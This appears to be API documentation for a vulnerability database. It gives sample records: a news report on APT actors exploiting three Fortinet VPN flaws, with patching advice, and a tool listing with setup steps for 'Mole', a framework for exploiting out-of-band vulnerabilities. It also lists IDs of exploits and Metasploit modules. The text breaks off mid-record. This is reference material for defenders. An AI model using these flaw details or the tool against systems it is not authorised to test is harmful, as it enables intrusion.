"documents": {
"THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A": {
"id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A",
"type": "threatpost",
"bulletinFamily": "info",
"title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs",
"description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company’s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n“It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,” according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). “APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.”\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n“Attackers are increasingly targeting critical external applications – VPNs have been targeted even more this last year,” said Zach Hanley, senior red team engineer at Horizon3.AI, via email. “These three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.”\n\nHanley added, “The common theme here is: once they are successful, they will look just like your normal users.”\n\nThe bugs are popular with cyberattackers in general, due to Fortinet’s widespread footprint, researchers noted.\n\n“CVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,” Satnam Narang, staff research engineer at Tenable, said via email. “In fact, Tenable’s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.”\n\nThe FBI and CISA didn’t specify which APTs are mounting the recent activity.\n\n## Initial Compromise & Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the warning explained. “APT actors may use other CVEs or common exploitation techniques—such as spear-phishing—to gain access to critical infrastructure networks to pre-position for follow-on attacks.”\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year’s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n“It’s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,” said Narang. “Over the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven’t done so already.”\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization’s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ – unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n",
"published": "2021-04-02T19:56:57",
"modified": "2021-04-02T19:56:57",
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/",
"reporter": "Tara Seals",
"references": [
"https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios",
"https://threatpost.com/newsletter-sign/",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812",
"https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/",
"https://threatpost.com/category/webinars/",
"https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar"
],
"cvelist": [
"CVE-2018-13379",
"CVE-2019-5591",
"CVE-2020-12812"
],
"lastseen": "2021-04-02T20:09:09",
"viewCount": 49,
"enchantments": {
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:35B88369-C440-49C0-98FF-C50E258FB32C",
"AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"
]
},
{
"type": "cve",
"idList": [
"CVE-2018-13379",
"CVE-2020-12812",
"CVE-2019-5591"
]
},
{
"type": "cisa",
"idList": [
"CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF"
]
},
{
"type": "nessus",
"idList": [
"MACOSX_FORTIOS_FG-IR-18-384.NASL",
"FORTIOS_FG-IR-19-037.NASL",
"FORTIOS_FG-IR-18-384.NASL",
"FORTIOS_FG-IR-18-384_DIRECT.NASL",
"FORTIOS_FG-IR-19-283.NASL"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:154147",
"PACKETSTORM:154146"
]
},
{
"type": "kitploit",
"idList": [
"KITPLOIT:763105754466120590",
"KITPLOIT:6516544912632048506",
"KITPLOIT:5397133847150975825",
"KITPLOIT:5563730483162396602",
"KITPLOIT:7070039119688478663",
"KITPLOIT:965198862441671998",
"KITPLOIT:816704453339226193",
"KITPLOIT:3532211766929466258",
"KITPLOIT:5376485594298165648",
"KITPLOIT:5829195600312197311"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:47288",
"EDB-ID:47287"
]
},
{
"type": "zdt",
"idList": [
"1337DAY-ID-33134",
"1337DAY-ID-33133"
]
},
{
"type": "dsquare",
"idList": [
"E-691"
]
},
{
"type": "exploitpack",
"idList": [
"EXPLOITPACK:E222442D181419B052AACE6DA4BC8485",
"EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"
]
},
{
"type": "thn",
"idList": [
"THN:9994A9D5CFB76851BB74C8AD52F3DBBE"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE",
"THREATPOST:71C45E867DCD99278A38088B59938B48",
"THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB"
]
},
{
"type": "qualysblog",
"idList": [
"QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"
]
}
],
"modified": "2021-04-02T20:09:09",
"rev": 2
},
"score": {
"value": 5.3,
"vector": "NONE",
"modified": "2021-04-02T20:09:09",
"rev": 2
},
"vulnersScore": 5.3
}
}
}
}
}
Example link: Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities
{
"result": "OK",
"data": {
"documents": {
"KITPLOIT:5878527601774962255": {
"id": "KITPLOIT:5878527601774962255",
"bulletinFamily": "tools",
"title": "Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities",
"description": "[  ](<https://1.bp.blogspot.com/-G4SnmIGlQ1g/YE6MCgPm1LI/AAAAAAAAVng/_Ts1qiMQNIQ2n2PWo7PYVmpCvzYo0XjiwCNcBGAsYHQ/s670/OOB.png>)\n\n \n\n\nA framework for identifying and [ exploiting ](<https://www.kitploit.com/search/label/Exploiting> \"exploiting\" ) out-of-band (OOB) vulnerabilities. \n\n \n\n\n** Installation & Setup ** \n \n** Mole Install ** \n\n\nPython >= 3.6 \n\n` virtualenv -p /usr/bin/python3 venv `\n\n` source venv/bin/activate `\n\n` ./venv/bin/pip3 install -r requirements.txt `\n\n` git submodule update --init --recursive `\n\nSet an API key in ` config.yml ` (must be the same for the client and server) \n\n \n** DNS Configuration ** \n\n\nYou'll need to configure the DNS records in your registrar to point to your mole server. Minimally, you'll need an ` A ` record for the name server and an ` NS ` record configured. \n\nMole can be configured to host other configuration options. \n\n \n** Mailgun (Optional) ** \n\n\nMailgun requires DNS entries to enable the service: [ https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain- ](<https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-> \"https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-\" )\n\n \n** TLS ** \n\n\nCurrently Mole does not support TLS natively. To implement TLS, use a [ reverse ](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) proxy such as [ nginx ](<https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/> \"nginx\" ) to terminate the TLS connection and forward [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) to the Mole server. \n\n \n** Burp Suite Extension ** \n\n\nThe [ Burp Suite Extension ](<https://www.kitploit.com/search/label/Burp%20Suite%20Extension> \"Burp Suite Extension\" ) requires a separate Python 2.7 virtual environment due to the latest version of Jython only supporting 2.7. Below are the instructions for setting up the virtual environment and configuring the Extension. \n\n 1. Create a new python2.7 virtualenv for burp/jython, ` virtualenv -p /usr/bin/python2.7 burp_venv `\n 2. Load the venv, ` source ./burp_venv/bin/activate `\n 3. Install the required packages, ` ./burp_venv/bin/pip -r requirements `\n 4. Configure the Python Environment by downloading and selecting the jython-standalone jar. \n 5. Set the \"Folder for loading modules\" to the full path to ` burp_venv/lib/python2.7/site-packages ` that was created in steps 1-3. \n\n[  ](<https://1.bp.blogspot.com/-53z9NzOrDJo/YE6MWNHzX2I/AAAAAAAAVnk/vjsFi57Qg9YEKk_5xmVQcnd7M4-nSpwjACNcBGAsYHQ/s848/mole_1_burp_python_env.png>)\n\n \n\n\n 4. Click Add \n\n[  ](<https://1.bp.blogspot.com/-uBrtnM3EiHw/YE6Ma0ftquI/AAAAAAAAVns/3ETgB3ZJkuMfH-GuIjL7MGcmdmg-9u8FQCNcBGAsYHQ/s340/mole_2_burp_ext_add_1.png>)\n\n \n\n\n 5. Set the Extension type to ` Python ` and select the ` mole_burp_extension.py ` file from the mole project directory. \n\n[  ](<https://1.bp.blogspot.com/-di2NDO2EU64/YE6MgarjeII/AAAAAAAAVnw/28mwlrkC4ngOnDOfCxSC_qEOpY2CYWoVwCNcBGAsYHQ/s880/mole_3_burp_ext_add_2.png>)\n\n \n\n\n 6. Click Next and if all goes well, there will be no errors on the load screen. \n\n[  ](<https://1.bp.blogspot.com/-YRA2FrXk5Bc/YE6Mk7RCZxI/AAAAAAAAVn0/qBMtUW1YmEwOoGPcLT6zUISOJAMbjO5QACNcBGAsYHQ/s835/mole_4_burp_ext_success.png>)\n\n \n\n\n** Configuration ** \n \n** Token ** \n\n\n` domain ` \\- Your custom domain \n\n` length ` \\- Length of the tokens (default 5) \n\nThe token character set is ascii upper & lower, and digits. The length can be modified to meet needs such as constrained space for a payload. The number of tokens per length is listed below. \n\n * 1 - 62 \n * 2 - 3844 \n * 3 - 238328 \n * 4 - 14776336 \n * 5 - 916132832 \n\n` ssl ` \\- Configure payloads for ` https ` vs ` http `\n\n``server` - domain or IP of the Mole token server \n\n` default_tags ` \\- list of default tags to add to all tokens. Useful for per-project/client tokens. \n\n \n** Server ** \n\n\n` api_key ` \\- API key used to authenticate requests to the mole API \n\n` dns_addr ` \\- IP address used to respond to DNS queries \n\n` db_conn ` \\- [ SQLAlchemy ](<https://www.sqlalchemy.org/> \"SQLAlchemy\" ) [ database URL ](<https://docs.sqlalchemy.org/en/13/core/engines.html> \"database URL\" ) . Default is a SQLite db in the root directory ` sqlite:///mole.db `\n\n` static_responses ` \\- list of DNS static response key/value pairs \n\n` web_port ` \\- configure the listening web port \n\n` dns_port ` -configure the listening dns port \n\n \n** Notifications ** \n\n\nAll notifications have an ` enabled ` flag that determines whether or not to trigger the notification on an interaction. Each notification plugin has its own configuration items. \n\n` mailgun ` \\- configure ` domain ` , ` to ` , ` from ` , and ` api_key ` to enable [ mailgun ](<https://www.mailgun.com/> \"mailgun\" ) email notifications \n\n` slack ` \\- ` token ` and ` channel `\n\n` webhook ` \\- generic POST webhook \n\n \n** Issues/Bugs ** \n\n\nI'm sure there are many, please create a new [ issue ](<https://github.com/ztgrace/mole/issues> \"issue\" ) and fill out the template as best as you can for quick triage. \n\n \n \n\n\n** [ Download Mole ](<https://github.com/ztgrace/mole> \"Download Mole\" ) **\n",
"published": "2021-03-21T11:30:03",
"modified": "2021-03-21T11:30:03",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "http://www.kitploit.com/2021/03/mole-framework-for-identifying-and.html",
"reporter": "KitPloit",
"references": [
"https://github.com/ztgrace/mole/issues",
"https://github.com/ztgrace/mole"
],
"cvelist": [],
"type": "kitploit",
"lastseen": "2021-03-21T15:30:33",
"edition": 1,
"viewCount": 152,
"enchantments": {
"dependencies": {
"references": [],
"modified": "2021-03-21T15:30:33",
"rev": 2
},
"score": {
"value": -0.1,
"vector": "NONE",
"modified": "2021-03-21T15:30:33",
"rev": 2
},
"vulnersScore": -0.1
},
"toolHref": "https://github.com/ztgrace/mole"
}
}
}
}
title¶
Field with bulletin title.
Examples:
"title": "The Colonial Pipeline Hack Is a New Extreme for Ransomware""title": "[SECURITY] [DLA 2614-1] busybox security update""title": "CVE-2020-1472"
description¶
Field that contains the necessary words for the query with all additional line breaks, tabs, and more.
Examples:
"description": "An attack has crippled the company's operations-and cut off a large portion of the East Coast's fuel supply-in an ominous development for critical infrastructure.""description": "Microsoft addressed a critical remote code execution vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. Beginning with the February 9, 2021 Security Update release, Domain Controllers will be placed in enforcement mode. This will require all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device. \n\nCISA encourages users and administrators to review the Microsoft [security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) and apply the necessary updates. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code>); we'd welcome your feedback.\n""description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'."
date¶
published: Bulletin publish date. Format: Date YYYY-MM-DD
modified: Bulletin last modification date. Format: Date YYYY-MM-DD
Examples:
"published": "2021-02-10T00:00:00", "modified": "2021-02-10T00:00:00""published": "2020-08-17T19:15:00", "modified": "2020-12-24T16:15:00"
cvss, cvss2, cvss3¶
(Obsolete) CVSS Score of security bulletin.
- score Format: Float
- vector Format: String
Examples:
"cvss": { "score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C" }"cvss": { "score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C" }
(Obsolete) CVSSv2
-
cvssV2 base vector:
- version Format: String,
- vectorString Format: String,
- accessVector Format: String,
- accessComplexity Format: String,
- authentication Format: String,
- confidentialityImpact Format: String,
- integrityImpact Format: String,
- availabilityImpact Format: String,
- baseScore Format: Float,
-
additional vector:
- severity Format: String,
- exploitabilityScore Format: Float,
- impactScore Format: Float,
- acInsufInfo Format: Bool,
- obtainAllPrivilege Format: Bool,
- obtainUserPrivilege Format: Bool,
- obtainOtherPrivilege Format: Bool,
- userInteractionRequired Format: Bool
Examples:
"cvss2": { "cvssV2": { "version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5 }, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false }
CVSSv3
- cvssV3 base vector
- version Format: String,
- vectorString Format: String,
- attackVector Format: String,
- attackComplexity Format: String,
- privilegesRequired Format: String,
- userInteraction Format: String,
- scope Format: String,
- confidentialityImpact Format: String,
- integrityImpact Format: String,
- **availabilityImpact***Format: String*,
- baseScore Format: Float,
- baseSeverity Format: String,
- additional vector
- exploitabilityScore Format: Float,
- impactScore Format: Float
Examples:
"cvss3": { "cvssV3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL" }, "exploitabilityScore": 3.9, "impactScore": 5.9 }
epss¶
EPSS Score of security bulletin. Contains list of EPSS values and percentiles for each CVE mentioned in the document
- cve Format: String
- epss Format: Float
- percentile Format: Float
- modified Format: Date
Examples:
"epss": [ { "cve": "CVE-2023-27372", "epss": 0.97141, "percentile": 0.99666, "modified": "2023-06-25" } ]
href¶
URL link to the source of the element.
Examples:
"href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code""href": "https://blog.qualys.com/category/vulnerabilities-research""href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1472"
reporter¶
Bulletin contributor or source information.
Examples:
"reporter": "CISA""reporter": "Anand Paturi""reporter": "[email protected]"
references¶
List of reference hrefs.
Examples:
"references": [ "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472" ]"references": []"references": [ "https://lists.fedoraproject.org/archives/list/[email protected]/message/TAPQQZZAT4TG3XVRTAFV2Y3S7OAHFBUP/", "http://www.openwall.com/lists/oss-security/2020/09/17/2", "https://lists.fedoraproject.org/archives/list/[email protected]/message/H4OTFBL6YDVFH2TBJFJIE4FMHPJEEJK3/", "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00080.html", "https://usn.ubuntu.com/4559-1/", "https://lists.debian.org/debian-lts-announce/2020/11/msg00041.html", "https://usn.ubuntu.com/4510-1/", "https://usn.ubuntu.com/4510-2/", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "https://www.synology.com/security/advisory/Synology_SA_20_21", "https://security.gentoo.org/glsa/202012-24", "https://lists.fedoraproject.org/archives/list/[email protected]/message/ST6X3A2XXYMGD4INR26DQ4FP4QSM753B/", "http://packetstormsecurity.com/files/159190/Zerologon-Proof-Of-Concept.html", "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00086.html", "http://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "https://www.kb.cert.org/vuls/id/490028" ]
cvelist¶
The entire list of CVEs to which the bulletin is applied.
Examples:
"cvelist": [ "CVE-2020-1472" ]"cvelist": [ "CVE-2016-0167", "CVE-2017-11774", "CVE-2019-0604", "CVE-2019-0708", "CVE-2020-1472" ]"cvelist": []
lastseen¶
Last update by bot. Timestamped automatically.
Examples:
"lastseen": "2021-01-19T20:27:05""lastseen": "2021-02-02T02:28:27""lastseen": "2021-01-15T02:37:55"
enchantments¶
Additional data not provided by the original source. This field is one of the kill features of the Vulners security intelligence engine — all entries in the database are linked and correlated.
Examples:
The field can be empty or contain dozens of records.
"enchantments": {
"dependencies": {
"references": [],
"modified": "2021-05-09T08:59:37",
"rev": 2
},
"score": {
"value": 1,
"vector": "NONE",
"modified": "2021-05-09T08:59:37",
"rev": 2
},
"vulnersScore": 1
}
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2016-0167",
"CVE-2019-0604",
"CVE-2020-1472",
"CVE-2017-11774",
"CVE-2019-0708"
]
},
{
"type": "symantec",
"idList": [
"SMNTC-108273",
"SMNTC-85900",
"SMNTC-101098",
"SMNTC-106914"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:DF071775-CD3A-4643-9E29-3368BD93C00F",
"AKB:53EE4907-A452-4559-B0F9-A00B1E59741B",
"AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB"
]
},
{
"type": "qualysblog",
"idList": [
"QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0",
"QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41",
"QUALYSBLOG:192411B44569225E2F2632594DC4308C"
]
},
{
"type": "fireeye",
"idList": [
"FIREEYE:2EB802483816EFF978E866E59F2BE3EE",
"FIREEYE:2C715246C212E9AF545405EB22BC10C3",
"FIREEYE:138CE2722761C87436AF4E8AA1B5FF22",
"FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"
]
},
{
"type": "msrc",
"idList": [
"MSRC:6A6ED6A5B652378DCBA3113B064E973B",
"MSRC:5B84BD451283462DC81D4090EFE66280",
"MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"
]
},
{
"type": "cisa",
"idList": [
"CISA:2B970469D89016F563E142BE209443D8",
"CISA:7FB0A467C0EB89B6198A58418B43D50C",
"CISA:433F588AAEF2DF2A0B46FE60687F19E0",
"CISA:61F2653EF56231DB3AEC3A9E938133FE",
"CISA:E5A33B5356175BB63C2EFA605346F8C7"
]
},
{
"type": "metasploit",
"idList": [
"MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP",
"MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/",
"MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE",
"MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860",
"RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5"
]
},
{
"type": "f5",
"idList": [
"F5:K25238311"
]
},
{
"type": "kitploit",
"idList": [
"KITPLOIT:4482238198881011483",
"KITPLOIT:998955151150716619"
]
},
{
"type": "hackerone",
"idList": [
"H1:534630",
"H1:536134"
]
},
{
"type": "pentestpartners",
"idList": [
"PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"
]
},
{
"type": "myhack58",
"idList": [
"MYHACK58:62201994152",
"MYHACK58:62201994154",
"MYHACK58:62201994153",
"MYHACK58:62201994234",
"MYHACK58:62201784690",
"MYHACK58:62201994162",
"MYHACK58:62201995881",
"MYHACK58:62201994259"
]
},
{
"type": "openvas",
"idList": [
"OPENVAS:1361412562310812024",
"OPENVAS:1361412562310812028",
"OPENVAS:1361412562310108611",
"OPENVAS:1361412562310811922"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:51A2EB5F46817EF77631C9F4C6429714",
"THREATPOST:BF27EB1E464BD713B35779742C991C59",
"THREATPOST:88C99763683E42B94F1E7D307C0D9904",
"THREATPOST:15A5FE4BB9B3391223C1802AA87BEF99",
"THREATPOST:2F655C93B7912A7C776E1DC1D39822D0",
"THREATPOST:157F244C629A1657480AFA561FF77BE4",
"THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825"
]
},
{
"type": "mmpc",
"idList": [
"MMPC:D6D537E875C3CBD84822A868D24B31BA"
]
},
{
"type": "mssecure",
"idList": [
"MSSECURE:D6D537E875C3CBD84822A868D24B31BA",
"MSSECURE:23C760CCBA6BF2ED8D8132921A32C2A3"
]
},
{
"type": "securelist",
"idList": [
"SECURELIST:094B9FCE59977DD96C94BBF6A95D339E",
"SECURELIST:35644FF079836082B5B728F8E95F0EDD",
"SECURELIST:847981DCB9E90C51F963EE1727E40915"
]
},
{
"type": "mskb",
"idList": [
"KB4011178",
"KB4462184",
"KB4011196",
"KB4011162",
"KB4462199",
"KB4462202"
]
},
{
"type": "seebug",
"idList": [
"SSV:96659"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6",
"MALWAREBYTES:E65F857AAAC912ABF5A439E335A3376B"
]
},
{
"type": "mscve",
"idList": [
"MS:CVE-2020-1472",
"MS:CVE-2019-0604",
"MS:CVE-2016-0167",
"MS:CVE-2017-11774"
]
},
{
"type": "thn",
"idList": [
"THN:F53D18B9EB0F8CD70C9289288AC9E2E1",
"THN:E9454DED855ABE5718E4612A2A750A98"
]
},
{
"type": "zdt",
"idList": [
"1337DAY-ID-33951"
]
},
{
"type": "zdi",
"idList": [
"ZDI-19-181"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:48053"
]
},
{
"type": "saint",
"idList": [
"SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87",
"SAINT:1AF7483E5B4DB373D9449DD910472EA5"
]
},
{
"type": "nessus",
"idList": [
"SUSE_SU-2020-2720-1.NASL",
"FEDORA_2020-77C15664B0.NASL",
"SUSE_SU-2020-2730-1.NASL",
"SMB_NT_MS17_OCT_OUTLOOK.NASL",
"OPENSUSE-2020-1513.NASL"
]
},
{
"type": "freebsd",
"idList": [
"24ACE516-FAD7-11EA-8D8C-005056A311D1"
]
},
{
"type": "carbonblack",
"idList": [
"CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF",
"CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9"
]
},
{
"type": "ubuntu",
"idList": [
"USN-4559-1",
"USN-4510-2",
"USN-4510-1"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:160127"
]
},
{
"type": "suse",
"idList": [
"OPENSUSE-SU-2020:1513-1",
"OPENSUSE-SU-2020:1526-1"
]
},
{
"type": "fedora",
"idList": [
"FEDORA:D8A0E3053060"
]
}
],
"modified": "2021-02-02T02:28:27",
"rev": 2
},
"score": {
"value": 7.6,
"vector": "NONE",
"modified": "2021-02-02T02:28:27",
"rev": 2
},
"vulnersScore": 7.6
}
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2020-4006",
"CVE-2020-14882",
"CVE-2019-19781",
"CVE-2021-21972",
"CVE-2019-7609",
"CVE-2019-11510",
"CVE-2020-5902",
"CVE-2021-26855",
"CVE-2019-9670",
"CVE-2018-13379"
]
},
{
"type": "thn",
"idList": [
"THN:461B7AEC7D12A32B4ED085F0EA213502",
"THN:ABF9BC598B143E7226083FE7D2952CAE",
"THN:9994A9D5CFB76851BB74C8AD52F3DBBE",
"THN:91A2A296EF8B6FD5CD8B904690E810E8",
"THN:2E67A9601D631B7905DA9FA7D2923108",
"THN:87AE96960D76D6C84D9CF86C2DDB837C",
"THN:A73831555CB04403ED3302C1DDC239B1",
"THN:814DFC4A310E0C39823F3110B0457F8C",
"THN:0E6CD47141AAF54903BD6C1F9BD96F44"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B",
"MALWAREBYTES:80B21E934B1C43C7071F039FE9512208"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:626313834C3B7D13BDDD703C425DACA5",
"THREATPOST:4844442F117316BC8EEC54269FACDAA8",
"THREATPOST:2243706D17F2A1E930A00F49D8E30720",
"THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB",
